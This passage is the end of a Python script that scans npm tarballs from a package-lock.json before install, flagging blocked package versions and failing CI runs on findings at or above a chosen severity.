        description = "Pre-install npm tarball content scanner.",
    )
    parser.add_argument(
        "--lockfile",
        default = str(REPO_ROOT / "studio" / "frontend" / "package-lock.json"),
        help = "Path to package-lock.json (default: studio/frontend).",
    )
    parser.add_argument(
        "--max-packages",
        type = int,
        default = 0,
        help = (
            "Cap on number of packages to scan (0 = no cap). Useful "
            "for local triage; CI runs with 0."
        ),
    )
    parser.add_argument(
        "--fail-on",
        choices = ("info", "medium", "high", "critical"),
        default = "high",
        help = (
            "Lowest severity that fails the run (default: high). "
            "Findings below the threshold print but do not fail."
        ),
    )
    args = parser.parse_args(argv)
    lockfile = Path(args.lockfile).resolve()
    if not lockfile.exists():
        print(f"[scan-npm] lockfile not found: {lockfile}", file = sys.stderr)
        return 2
    entries, struct_findings = parse_lockfile(lockfile)
    if struct_findings:
        print(
            f"[scan-npm] {len(struct_findings)} structural finding(s) "
            "from lockfile pass; subsequent download scan skipped for "
            "those entries.",
            flush = True,
        )
    if args.max_packages > 0:
        entries = entries[: args.max_packages]
    workspace = Path(tempfile.mkdtemp(prefix = "npm-scan-")).resolve()
    atexit.register(lambda: shutil.rmtree(workspace, ignore_errors = True))
    print(
        f"[scan-npm] workspace: {workspace}\n"
        f"[scan-npm] scanning {len(entries)} package(s) from {lockfile}",
        flush = True,
    )
    all_findings: list[Finding] = list(struct_findings)
    hard_errors: list[tuple[str, str]] = []
    for i, pkg in enumerate(entries, start = 1):
        print(
            f"[scan-npm] [{i}/{len(entries)}] {pkg.display}",
            flush = True,
        )
        blocked = BLOCKED_NPM_VERSIONS.get(pkg.name, set())
        if pkg.version in blocked:
            finding = Finding(
                severity = CRITICAL,
                package = pkg.display,
                filename = "<lockfile>",
                pattern = "blocked-known-malicious",
                detail = f"{pkg.name}@{pkg.version} is on the BLOCKED_NPM_VERSIONS list",
            )
            all_findings.append(finding)
            print(str(finding), flush = True)
            continue
        findings, err = scan_one(pkg, workspace)
        if err:
            hard_errors.append((pkg.display, err))
            print(f"[scan-npm] ERROR {pkg.display}: {err}", flush = True)
            continue
        all_findings.extend(findings)
        for f in findings:
            print(str(f), flush = True)
    # Sort by severity then package.
    all_findings.sort(key = lambda f: (_SEVERITY_RANK[f.severity], f.package))
    print(
        f"\n[scan-npm] summary: {len(entries)} package(s), "
        f"{len(all_findings)} finding(s), "
        f"{len(hard_errors)} hard error(s)",
        flush = True,
    )
    if hard_errors:
        print("\n[scan-npm] HARD ERRORS:", file = sys.stderr)
        for pkg_name, err in hard_errors:
            print(f" {pkg_name}: {err}", file = sys.stderr)
    threshold = {
        "info": INFO,
        "medium": MEDIUM,
        "high": HIGH,
        "critical": CRITICAL,
    }[args.fail_on]
    threshold_rank = _SEVERITY_RANK[threshold]
    blocking = [f for f in all_findings if _SEVERITY_RANK[f.severity] <= threshold_rank]
    if blocking:
        print(
            f"\n[scan-npm] FAIL: {len(blocking)} finding(s) "
            f"at or above {threshold}",
            file = sys.stderr,
        )
        return 1
    if hard_errors:
        # Per the module docstring's exit-code contract, hard failures
        # (download error, integrity mismatch, malformed tarball) are
        # internal errors, not findings.
        return 2
    print("\n[scan-npm] OK", flush = True)
    return 0


if __name__ == "__main__":
    sys.exit(main())
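
# Usage sketch (flags as defined in main() above):
#   python scripts/scan_npm_packages.py                     # full CI scan
#   python scripts/scan_npm_packages.py --max-packages 25   # local triage
#   python scripts/scan_npm_packages.py --fail-on critical  # only CRITICAL fails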